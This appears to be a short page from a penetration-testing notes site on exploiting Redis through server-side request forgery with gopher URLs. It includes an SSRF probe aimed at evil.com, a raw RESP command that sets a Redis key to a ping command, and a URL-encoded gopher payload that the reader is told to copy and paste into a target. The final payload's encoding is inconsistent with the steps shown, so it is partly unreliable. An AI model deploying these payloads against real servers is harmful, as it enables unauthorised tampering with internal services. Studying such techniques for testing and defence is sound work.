# Redis SSRF

### Investigation <a href="#investigation" id="investigation"></a>

If the target server runs Redis server and the website interacts with the Redis server, we can modify the key value in the Redis and reflects the result through SSRF using **gopher**.

```shellscript
url=http://evil.com/
```

### Exploitation <a href="#exploitation" id="exploitation"></a>

#### Automation <a href="#automation" id="automation"></a>

We can use [Gopherus](https://github.com/tarunkant/Gopherus) to create a payload.

#### Payload Manually <a href="#payload-manually" id="payload-manually"></a>

To make the payload for SSRF manually, we need to know what commands to insert.\
To make it clear, try to demonstrate the command (RESP format) to update the target key value in Redis. Please see the [Redis commands](https://exploit-notes.hdks.org/exploit/database/redis/) for details.

Below is the example command same as **`SET user ...`**.

```shellscript
telnet 10.0.0.1 6379
*3 # 3 arguments ("SET", "user", "")
$3 # 3 length of the string "SET"
SET
$4 # 4 length of the string "user" key
user
$18 # 18 length of the string ""
ping+-c+1+10.0.0.2
```

Then we need to format the above command for the gopher URL. It’s need to be URL encoded conained **`%0D%0A (\r\n)`**.

```shellscript
gopher://10.0.0.1:6379/_%0D
%0D%0A # \r\n
%2A3 # *3
%0D%0A # \r\n
%243 # $3
%0D%0A # \r\n
SET
%0D%0A # \r\n
%244 # $4
%0D%0A # \r\n
user
%0D%0A # \r\n
%2418 # $18
%0D%0A
ping%2B%2Dc%2B1%2B10%2E0%2E0%2E2 # ping+-c+1+10.0.0.2
%0D%0A
```

Finally we get the payload.

```
gopher://10.0.0.1:6379/_%250D%0A%250D%250A%0A%252A3%0A%250D%250A%0A%25243%0A%250D%250A%0ASET%0A%250D%250A%0A%25244%0A%250D%250A%0Auser%0A%250D%250A%0A%252418%0A%250D%250A%0Aping+-c+1+10.0.0.2%0A%250D%250A
```

Copy it and paste to where the payload affects the result.

### References <a href="#references" id="references"></a>

* [InfoSec Writeups](https://infosecwriteups.com/exploiting-redis-through-ssrf-attack-be625682461b)